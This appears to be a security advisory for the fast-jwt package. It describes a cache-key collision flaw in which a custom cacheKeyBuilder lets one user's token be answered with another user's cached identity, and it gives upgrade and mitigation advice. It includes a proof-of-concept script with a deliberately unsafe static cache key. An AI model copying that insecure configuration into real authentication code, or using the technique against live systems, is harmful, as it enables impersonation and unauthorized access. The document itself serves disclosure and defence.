Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade fast-jwt to version 6.1.0 or higher.
fast-jwt is a fast JSON Web Token implementation.
Affected versions of this package are vulnerable to Improper Validation of Unsafe Equivalence in Input in the cacheKeyBuilder function. When a custom cacheKeyBuilder implementation does not generate unique keys for different tokens, verification results collide in the cache: a later token is served the cached result of an earlier one. An attacker can gain unauthorized access to another user's identity and permissions by submitting a token whose cache key collides with that user's.
Note:
This is only exploitable if caching is enabled and a custom cacheKeyBuilder function is used that can produce identical keys for different tokens.
This vulnerability can be mitigated by ensuring the custom cacheKeyBuilder generates unique keys for each token, removing the custom cacheKeyBuilder, or disabling caching.
```javascript
const { createSigner, createVerifier } = require('fast-jwt')
const sign = createSigner({ key: 'secret' })

// Two distinct, validly signed tokens for two different users
const t1 = sign({ sub: 'userA', aud: 'admin' })
const t2 = sign({ sub: 'userB', aud: 'admin' })

// Deliberately unsafe cache key builder: every token maps to the same key,
// so the verifier's cache cannot tell the tokens apart (collision)
const verify = createVerifier({
  key: 'secret',
  cache: true,
  cacheKeyBuilder: () => 'static-key'
})

// First verification populates the cache under 'static-key' with t1's payload
console.log('verify t1')
const p1 = verify(t1)
console.log('t1 PASS sub=', p1.sub)

// Cache hit on the same key: t2 is answered with the cached payload of t1,
// so the identity reported for t2 is userA, not userB
console.log('verify t2')
const p2 = verify(t2)
console.log('t2 PASS sub=', p2.sub)

// Repeated verifications keep returning the single cached entry
console.log('verify t2 again')
const p3 = verify(t2)
console.log('t2-again PASS sub=', p3.sub)

console.log('verify t1 again')
const p4 = verify(t1)
console.log('t1-again PASS sub=', p4.sub)
```